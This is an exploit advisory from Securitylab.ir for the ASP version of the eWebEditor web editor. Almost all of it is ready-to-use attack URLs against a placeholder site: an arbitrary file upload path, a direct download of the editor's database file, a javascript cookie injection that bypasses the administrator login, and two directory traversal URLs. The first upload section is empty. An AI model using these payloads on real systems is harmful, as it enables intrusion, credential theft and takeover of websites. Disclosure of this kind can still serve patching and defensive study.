################################################################# # Securitylab.ir ################################################################# # Application Info: # Name: eWebeditor # Version: ASP ################################################################# Vulnerability: ======================= Arbitrary File Upload =======================



 

======================= Arbitrary File Upload 2 ======================= http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup ======================= Database Disclosure ======================= http://site.com/ewebeditor/db/ewebeditor.mdb ======================= Administrator bypass ======================= http://site.com/eWebEditor/admin/login.asp put this code instead URL javascript: alert (document.cookie = "adminpass =" + escape ( "admin")); ======================= Directory Traversal ======================= http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./.. ======================= Directory Traversal 2 ======================= http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./.. ################################################################# # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir & whh_iran@yahoo.com ###################################################################